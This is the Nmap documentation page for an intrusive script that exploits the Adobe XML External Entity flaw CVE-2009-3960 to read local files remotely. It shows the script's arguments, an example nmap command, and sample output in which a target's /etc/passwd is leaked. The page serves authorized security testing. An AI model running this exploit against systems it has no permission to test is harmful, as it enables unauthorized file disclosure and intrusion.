File http-vuln-cve2009-3960
Script types:
portrule
Categories:
exploit, intrusive
Download: http://nmap.org/svn/scripts/http-vuln-cve2009-3960.nse
User Summary
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.
This vulnerability permits to read local files remotely and is present in BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion 7.0.2, 8.0, 8.0.1, and 9.0
For more information see:
- http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
- http://www.osvdb.org/62292
- Metasploit module: auxiliary/scanner/http/adobe_xml_inject
Script Arguments
http-vuln-cve2009-3960.root
Points to the root path. Defaults to "/"
http-vuln-cve2009-3960.readfile
target file to be read. Defaults to "/etc/passwd"
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent
See the documentation for the http library.vulns.showall
See the documentation for the vulns library.Example Usage
nmap --script=http-vuln-cve2009-3960 --script-args http-http-vuln-cve2009-3960.root="/root/" <target>
Script Output
PORT STATE SERVICE 80/tcp open http | http-vuln-cve2009-3960: | samples/messagebroker/http | <?xml version="1.0" encoding="utf-8"?> | <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string><string>headers</string><string>body</string><string>correlationId</string><string>messageId</string><string>timeToLive</string><string>clientId</string><string>destination</string></traits><double>1.325337665684E12</double><object><traits><string>DSMessagingVersion</string><string>DSId</string></traits><double>1.0</double><string>5E037B49-540B-EDCF-A83A-BE9059CF6812</string></object><null/><string>root:x:0:0:root:/root:/bin/bash | bin:*:1:1:bin:/bin:/sbin/nologin | daemon:*:2:2:daemon:/sbin:/sbin/nologin | adm:*:3:4:adm:/var/adm:/sbin/nologin | lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin | sync:*:5:0:sync:/sbin:/bin/sync | shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown | halt:*:7:0:halt:/sbin:/sbin/halt | mail:*:8:12:mail:/var/spool/mail:/sbin/nologin | news:*:9:13:news:/etc/news: | uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin | operator:*:11:0:operator:/root:/sbin/nologin | games:*:12:100:games:/usr/games:/sbin/nologin | gopher:*:13:30:gopher:/var/gopher:/sbin/nologin | ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin | nobody:*:99:99:Nobody:/:/sbin/nologin | nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin | vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin | pcap:!!:77:77::/var/arpwatch:/sbin/nologin | mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin | ... |_
Requires
Author: Hani Benhabiles
License: Same as Nmap--See http://nmap.org/book/man-legal.html